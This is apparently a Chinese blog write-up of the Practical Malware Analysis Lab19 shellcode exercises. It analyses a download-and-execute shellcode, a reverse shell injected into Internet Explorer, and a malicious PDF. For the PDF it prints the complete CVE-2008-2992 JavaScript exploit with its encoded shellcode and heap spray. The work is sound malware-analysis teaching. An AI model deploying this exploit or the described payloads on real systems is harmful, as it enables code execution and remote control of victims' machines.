恶意代码分析实战 16 Shellcode分析

news/2024/11/16 21:25:54/

16.1 Lab19-01

将程序载入IDA。
chrome_WVSzr1fp3B.png
一堆ecx自增的操作。到200是正常的代码段。
chrome_S7YBasEyyp.png
shellcode的解码器也是从这里开始的,一开始的xor用于清空ecx,之后将18dh赋给cx,jmp来到loc_21f,而在下图可以看到loc_21调用sub_208,在call指令执行后,就会把下一条指令的地址也就是224压到栈顶。
如下所示。
chrome_NXOXsFuE4Y.png
可见这里是一个循环,循环体外的202处看到ecx被赋值18dh,循环体中的21B处有dec ecx,这说明ecx是起到计数器的作用,将光标定位到sub_208,按空格键切换模式。
chrome_59HjPpHEVw.png
切换回来,208处pop指令会将栈顶也就是224这个地址赋给esi,之后push则是将其压栈,mov指令将esi赋给edi,lodsb指令在这里是将esi赋给eax,esi中的地址是224,该地址的值是多少呢?我们光标定位到224,按d键。
chrome_gj4wOzI3Ac.png
可以看到该地址的值是49h,也就是将49h赋给eax,之后al赋给dl,dl此时的值就是49h,dl减去41h,所得结果左移4位,然后esi自增,变成了225,同样定位225,按d键,结果如下。
chrome_9HwCN5E7mQ.png

问题

  1. 这段shellcode是如何编码的?

这个shellcode使用了一种字母编码的方式,攻击负载的一个字节存储在两个编码字节的低4比特位。

  1. 这段shellcode手动导入了哪个函数?

shellcode导入了:
LoadL ibraryA
GetSystemDirectoryA
WinExec
URLDownloadToFileA
从上图可以看到shellcode会连接到http://www.practicalmalwareanalysis. com/shellcode/annoy_user. exe

  1. 这段shellcode和哪个网络主机通信?

http://www.practicalmalwareanalysis.com/shellcode/annoy_user.exe。
使用URLDownloadToFile将annoy_user.exe下载后保存为了system32目录下的1.exe文件,之后会通过winexec来运行。

  1. 这段shellcode在文件系统上留下了什么迹象

shellcode 在文件系统上写了文件%SystemRoot%\System32\I.exe,并运行它。

  1. 这段shellcode做了什么?

shellcode 会从指定的URL下载文件,将下载的文件写到硬盘,并运行它。

16.2 Lab19-02

把样本拖入VT内分析:
chrome_cqFVvb163W.png
可以看到爆红,查看一下细节, 发现了IE浏览器进程被创建了。
chrome_Ib1iW5XYPU.png
查看一下导入函数,发现导入了提权相关API。
chrome_LBZsnJ7rFs.png
还有远线程注入以及进程创建相关的API ==========>当然,通过PEID或者depends工具都是可以看到该exe导入的函数!
chrome_Q6ACZ4I91C.png
现在把程序拖入IDA中,一上来就获取了debug权限,后来就获取了IE的路径。
chrome_fn1YzBHq4p.png
其打开了注册表的HKEY_LOCAL_MACHINE\http\shell\open\command项, 即IE的路径,这个命令行执行后会打开IE浏览器。
chrome_0zI8e654yn.png
接着就以隐藏方式开启了IE浏览器,接着把shellcode注入到IE浏览器内部。
chrome_FNREzKe5kZ.png
chrome_oS46GpDmJY.png
这里是创建远线程进行注入的代码:。
chrome_qvJzDJ2rhf.png
shellcode的首地址以参数形式传递给了函数。
chrome_hUf7quwgKO.png
获取shellcode的首地址:
chrome_QihanA8VsA.png
接下来我们直接用Ollydbg来调试shellcode, 将EIP指针指向该shellcode的首地址。
chrome_oSEvpJjqAG.png
0xE7是秘钥, 利用这个来解密代码。
chrome_QauEHaJqpJ.png
注意这段代码, 它的首地址是0x407048。
chrome_1nceceFUGs.png
问题

  1. 这段shellcode被注入到什么进程中?

这个程序进程注入默认浏览器Internet Explorer中。

  1. 这段shellcode位于哪里?

shellcode的缓存区位于0x407030位置。

  1. 这段shellcode是如何被编码的?

shellcode与字节0x7e异或。

  1. 这段shellcode手动导入了哪个函数

shellcode导入以下函数:

  • LoadLibraryA
  • CreateProcessA
  • TerminateProcess
  • GetCurrentProcess
  • WSAStarup
  • WSASocketA
  • connect
  1. 这段shellcode和什么网络主机进行通信?

shellcode在TCP端口13330上连接IP地址192.168.200.2

  1. 这段shellcode做了什么?

这个shellcode提供了一个远程shell(cmd.exe)。

16.3 Lab19-03

问题

  1. 这个PDF中使用了什么漏洞

使用PDFStreamDumper软件打开Lab19-03.pdf,点击Exploits_Scan。
vmware_lyGmiDGjmx.png
得到如下内容:

Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 9

Note other exploits may be hidden with javascript obsfuscation
It is also possible these functions are being used in a non-exploit way.

PDF文件中包含一个CVE-2008-2992漏洞利用的例子:与Adobe Reader的util.printf的JavaScript实现相关的缓冲区溢出函数。

  1. 这段shellcode是如何编码的?

点击此处。
vmware_S4vyggqlSt.png
此处包含了一个打开PDF将被运行的JavaScript脚本。

var payload = unescape("%ue589%uec81%u017c%u0000%u6ee8%u0001%u8e00%u0e4e%u72ec%ub3fe%u8316%ub5b9%ue678%u8f17%u337b%u8aca%u4f5b%uc703%ua5bf%u0017%uad7c%u7d9b%uacdf%uda08%u1676%ufa65%u1f10%u0a79%ufbe8%ufd97%uec0f%u0397%uf60c%ub922%u5e7c%ue1bb%u021b%u00c6%u6f00%u0010%u0000%u00a0%u6f00%u00b0%u4e00%u0014%u5600%u8b57%u2474%u310c%ufcff%uc031%u38ac%u74e0%uc10a%u0dcf%uc701%uefe9%uffff%u89ff%u5ff8%uc25e%u0004%u8b60%u246c%u8b24%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u2ae3%u8b49%u8b34%uee01%ue856%uffbb%uffff%u443b%u2824%uec75%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%ue9e8%u0002%u0000%uc031%u4489%u1c24%uc261%u0008%u3156%u64c0%u408b%u8530%u78c0%u8b0f%u0c40%u708b%uad1c%u408b%ue908%u0005%u0000%ufbe9%uffff%u5eff%u55c3%ue589%uec83%u6008%u758b%u890c%u8bf7%u1455%u4d8b%uac10%ud030%uc2fe%ue2aa%u6af8%u6a00%u6a02%u6a04%u6a00%u6803%u0000%u4000%u458b%u5018%u5d8b%uff08%u1853%u4589%ufffc%u1075%u75ff%u500c%u73ff%ue828%u000d%u0000%u75ff%ufffc%u2c53%u8961%u5dec%u14c2%u5500%ue589%uc031%u5050%u8d60%ufc75%u7d8d%u8bf8%u1055%u5503%u8bfc%u1445%u452b%u68fc%u0000%u0000%u5057%uff52%u0c75%u55ff%u8508%u74c0%u8b0b%u0107%u8b06%u3b16%u1455%ud772%u8961%u5dec%u10c2%u5e00%u7589%u89ec%u89f7%ue8f3%uff42%uffff%u4589%ub9fc%u000e%u0000%u50ad%u75ff%ue8fc%ufee4%uffff%ue2ab%u68f3%u336c%u0032%u7368%u6568%u896c%u50e0%u13ff%uad91%u5150%uc9e8%ufffe%uabff%uf631%u5d8b%u81ec%u04c6%u0000%u8d00%uf845%u5650%u53ff%u3b1c%u3c43%ued75%u7589%u31f8%uffd2%u4473%uff52%u3053%uc085%u840f%u0131%u0000%u4589%u31f4%u52d2%uff52%u4073%u75ff%ufff8%u2053%u73ff%uff44%uf475%u75ff%ufff8%u2473%u3ae8%uffff%u31ff%u8dc0%udcbd%ufffe%ub9ff%u0040%u0000%uabf3%ubd8d%ufedc%uffff%u6857%u0100%u0000%u53ff%u3110%u8dc0%udcbd%ufffe%uf2ff%u4fae%u7d89%uc7e4%u6607%u6f6f%uc72e%u0447%u7865%u0065%u5d8b%u8dec%udc85%ufffe%u50ff%u4a68%u0000%uff00%u4473%u75ff%u53f4%u94e8%ufffe%u31ff%u8dc0%u88bd%ufffe%ub9ff%u0015%u0000%uabf3%u958d%ufe88%uffff%u8d52%u9895%ufffe%u52ff%u5050%u6850%uffff%uffff%u5050%u8d50%udc85%ufffe%u50ff%u53ff%uff04%uf475%u53ff%u3134%u8bd2%uec5d%u73ff%u524c%u53ff%u8530%u74c0%u8974%uf045%ud231%u5252%u73ff%uff48%uf875%u53ff%uff20%u4c73%u75ff%ufff0%uf875%u73ff%ue824%ufe7d%uffff%u458b%uc7e4%u6200%u7261%uc72e%u0440%u6470%u0066%u858d%ufedc%uffff%u6a50%u8b4a%uec5d%u73ff%uff4c%uf075%ue853%ufe03%uffff%uc931%u858d%ufe98%uffff%u00c7%u706f%u6e65%u40c6%u0004%u0568%u0000%u5100%u8d51%udc85%ufffe%u50ff%u858d%ufe98%uffff%u5150%u53ff%uff38%u0c53%u0068%u0000%u5000%u53ff%u9008%u9090");
var version = app.viewerVersion;
app.alert("Running PDF JavaScript!");
if (version >= 8 && version < 9) {var payload;nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")heapblock = nop + payload;bigblock = unescape("%u0A0A%u0A0A");headersize = 20;spray = headersize+heapblock.length;while (bigblock.length<spray) {bigblock+=bigblock;}fillblock = bigblock.substring(0, spray);block = bigblock.substring(0, bigblock.length-spray);while(block.length+spray < 0x40000) {block = block+block+fillblock;}mem = new Array();for (i=0;i<1400;i++) {mem[i] = block + heapblock;}var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);
} else {app.alert("Unknown PDF version!");
}

unescape函数和一个长的文本字符串和初始化攻击负载。unescape按下列方法翻译每个%字符串。

  • 如果%后跟一个u,则它取出后面4个字符,将它们作为一个ASCII的十六进制,并且将它转化为2个字节。由于大小端的原因,输出次序将会被交换。
  • 如果%后没有跟一个u,则取出后面2个字符,将它们作为一个ASCII的十六进制,并且将其翻译至一个字节。

例如,以%ue589%uec81%u017c开头的字符串将被转化为十六进制的序列,0x89 0xe5 0x81 0xec 0x7c 0x01。

  1. 这段shellcode手动导入了哪个函数?

scdbg -f Lab19-03_sc.bin -fopen Lab19-03.pdf -i

vmware_Tf4Q1i3C81.png
这个shellcode手动导入如下函数:
msedge_c5PsBAKJqN.png

  1. 这段shellcode在文件系统上留下了什么迹象?

看一下scdbg的结果,可以发现,shellcode在文件系统上创建文件%TEMP%\foo.exe与%TEMP%\bar.pdf。

  1. 这段shellcode做了什么?

使用IDA打开Lab19-03_sc.bin文件,在此处点击c转换成代码。
vmware_ZhQMMkDy0X.png
shellcode开头使用call/pop技术获取一个全局数据的指针。
vmware_qZmd7H4uOI.png
vmware_ZUhOPvbQ4j.png
0x183是Lab19-01中描述的findKernel32Base,0x195是findSymbolByHash函数。
shellcode循环遍历符号哈希数组,解析它们并将它们存回来创建一个函数指针数组。在①处,它对kernel做了14次操作。然后,在②处,shellcode向栈中压入两个DWORD值来创建字符串shell32,并将其作为LoadLibraryA的参数。只有一个来自shell32.dll的导出项被解析,冰杯加入导函数指针数组中。
shellcode从PDF中提取其中存储的两个编码文件,并且将它们写入%TEMP%目录。同时,它运行foo.exe文件,并用默认的处理器打开bar.pdf文件。


http://www.ppmy.cn/news/19643.html

相关文章

【数据结构】7.2 线性表的查找

文章目录7.2.1 顺序查找&#xff08;线性查找&#xff09;顺序查找算法设置监视哨的顺序查找顺序查找算法分析7.2.2 折半查找&#xff08;二分或对分查找&#xff09;折半查找算法折半查找性能分析 - 判定树7.2.3 分块查找分快查找算法分块查找算法分析及比较查找方法比较7.2.1…

【进击的算法】基础算法——怎么优雅地控制边界范围

学习范围 &#xff1a; ✔️数组 ✔️边界控制本文作者 &#xff1a; 蓝色学者i 边界控制的艺术前言一、为什么需要控制边界&#xff1f;二、怎么优雅地控制边界&#xff1f;三、令人抓狂的二分查找3.1 题目概述3.2解题思路3.3 解决方案方案一&#xff1a;边界都有效方案二&…

Docker 基础 - 3

Web 服务器与应用 Nginx 我的Nginx Docker镜像 ## 设置继承自己创建的 sshd 镜像 FROM caseycui/ubuntu-sshd## 维护者 LABEL maintainer"CaseyCui cuikaidongfoxmail.com"## 安装 nginx RUN apt-get update \&& DEBIAN_FRONTENDnoninteractive apt-get ins…

[Python]调用pytdx的代码示例

安装pytdxpip install pytdx简单示范from pytdx.hq import TdxHq_API api TdxHq_API() # 数据获取接口一般返回list结构&#xff0c; with api.connect(119.147.212.81, 7709): # 返回普通listdata api.get_security_bars(9, 0, 000001, 0, 10) print(data)输出结果[Ordered…

什么是YOLOR?

简述YOLOR 是一种用于对象检测的最先进的机器学习算法&#xff0c;与 YOLOv1-YOLOv5 不同&#xff0c;原因在于作者身份、架构和模型基础设施的差异。YOLOR 代表“你只学习一种表示”&#xff0c;不要与 YOLO 版本 1 到 4 混淆&#xff0c;其中 YOLO 代表“你只看一次”。 YOLO…

深度卷积对抗神经网络 基础 第四部分 可控制的GANs(Controllable GANs)

不同的生成模型定义 深度卷积对抗神经网络包含两种不同的生成模型&#xff0c; 条件生成模型 和非条件生成模型。非条件生成模型就像是一个彩票机或者赌博机&#xff0c;你输入一个任意数字的硬币数量&#xff0c;而输出则是随机的彩球。这样的系统&#xff0c;我们不能控制输…

Leetcode:491. 递增子序列(C++)

目录 问题描述&#xff1a; 实现代码与解析&#xff1a; 回溯&#xff1a; 原理思路&#xff1a; 优化版&#xff1a; 原理思路&#xff1a; 问题描述&#xff1a; 给你一个整数数组 nums &#xff0c;找出并返回所有该数组中不同的递增子序列&#xff0c;递增子序列中 至…

3000字英文随笔(挽救下语感)

&#x1f33c;遥远的她(吉他版) - 張子铭 - 单曲 - 网易云音乐 &#x1f33c;New Boy - 房东的猫/陈婧霏 - 单曲 - 网易云音乐 实际只有800个单词哈 我会借助有道词典&#xff0c;百度翻译 结合所剩不多的语感&#xff0c;尽己所能地道地表达 杜绝中式英语&#xff0c;当…